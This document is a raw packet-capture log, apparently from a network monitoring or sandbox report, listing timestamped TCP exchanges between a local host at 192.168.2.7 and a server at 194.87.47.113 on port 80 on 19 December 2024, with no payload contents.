Dec 19, 2024 08:47:24.831605911 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.831655025 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.832182884 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.832381010 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.832468987 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.832998037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.833208084 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.833260059 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.833821058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.834041119 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.834139109 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.834547997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.834754944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.834908009 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.834908009 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.835361958 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.835545063 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.836124897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.836188078 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.836322069 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.837021112 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.837091923 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.837167025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.837443113 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.837722063 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.837913036 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.837949038 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.838526011 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.838723898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.838785887 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.839335918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.839530945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.839574099 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.840131998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.840318918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.840394020 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.840934992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.841206074 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.841285944 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.841689110 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.841870070 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.841953993 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.842468023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.842658043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.842739105 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.843264103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.848831892 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.983072996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.983196974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.983453989 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.983560085 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.983952045 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.984023094 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.984267950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.984616041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.984798908 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.984941006 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.991003036 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.991187096 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.991209030 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.991563082 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.991576910 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.991631031 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.992300987 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.992408991 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.992575884 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.992947102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.993323088 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.993364096 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.993741989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.993839025 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.993973970 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.994573116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.994642973 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.994714022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.995331049 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.995383978 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.995532990 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.996160984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.996294022 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.996328115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.996607065 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.996901035 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.996979952 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.997111082 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.997724056 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.997872114 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.997910023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.005064011 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.005251884 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.005259991 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.005556107 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.005990982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.006161928 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.006253958 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.006633043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.006666899 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.006961107 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.007333994 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.007391930 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.007822037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.008008003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.008272886 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.008563995 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.008691072 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.008747101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.009372950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.009548903 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.009618044 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.010140896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.010327101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.010432005 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.010940075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.011135101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.011174917 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.011713982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.011760950 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.011905909 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.012537003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.012661934 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.012686968 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.013329029 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.013382912 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.013513088 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.014105082 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.014285088 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.014394999 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.014878035 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.015120983 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.015333891 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.015681028 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.015875101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.015954018 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.016459942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.016613960 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.016664982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.017261028 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.017316103 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.017486095 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.018073082 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.018315077 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.018379927 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.018853903 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.018945932 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.019028902 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.019659042 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.019800901 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.019840956 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.020452976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.020545006 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.020629883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.021240950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.021315098 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.021369934 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.022028923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.022115946 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.022224903 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.022804976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.022851944 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.022979021 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.023588896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.023695946 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.023780107 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.024394989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.024452925 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.024571896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.025252104 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.025388002 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.025458097 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.025971889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.026053905 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.026169062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.026772022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.026935101 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.026961088 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.027734995 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.027868986 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.027939081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.027945995 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.028336048 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.028636932 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.028697968 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.029123068 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.029248953 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.029433012 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.030355930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.030410051 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.030498028 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.030854940 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.030941963 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.031011105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.031555891 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.031692028 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.031713009 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.032320023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.032453060 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.032515049 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.033098936 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.033350945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.033356905 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.033890009 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.034096956 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.034179926 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.034689903 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.034744978 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.034882069 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.035505056 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.035621881 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.035639048 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.090889931 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.091212988 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.111339092 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.175223112 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.175349951 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.175426960 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.175735950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.176107883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.176168919 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.176423073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.176836014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.176898956 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.177139997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.183275938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.183336020 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.183470964 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.183815002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.183974028 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.184216976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.184519053 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.184582949 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.184861898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.185276031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.185372114 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.185550928 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.186067104 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.186137915 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.186320066 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.186841011 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.186887980 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.187024117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.187669992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.187846899 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.187849998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.188437939 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.188513041 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.188683033 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.189337969 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.189388990 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.189482927 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.189989090 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.190048933 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.190159082 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.197412014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.197477102 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.197674036 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.197927952 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.198214054 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.198257923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.198669910 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.198806047 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.198970079 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.199357986 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.199435949 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.199687004 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.200177908 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.200268030 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.200387001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.200957060 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.201056004 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.201116085 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.201730967 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.201800108 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.201905012 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.202507019 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.202673912 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.202687025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.203295946 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.203357935 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.203504086 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.204086065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.204219103 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.204243898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.204869032 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.204992056 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.205094099 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.205688000 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.205823898 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.205843925 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.206454992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.206532001 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.206657887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.207381964 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.207431078 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.207582951 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.208065033 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.208113909 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.208321095 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.208895922 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.208956003 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.209034920 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.209635973 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.209736109 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.209801912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.210443020 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.210572958 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.210648060 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.211237907 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.211333990 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.211405039 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.212068081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.212186098 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.212210894 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.212239027 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.212821007 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.212899923 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.212986946 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.213609934 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.213727951 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.213773966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.214392900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.214469910 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.214607000 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.215186119 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.215337038 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.215375900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.216007948 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.216073990 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.216141939 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.216769934 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.216841936 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.216926098 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.217559099 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.217650890 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.217776060 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.218350887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.218435049 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.218533993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.219177008 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.219244957 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.219464064 CET	80	49707	194.87.47.113	192.168.2.7
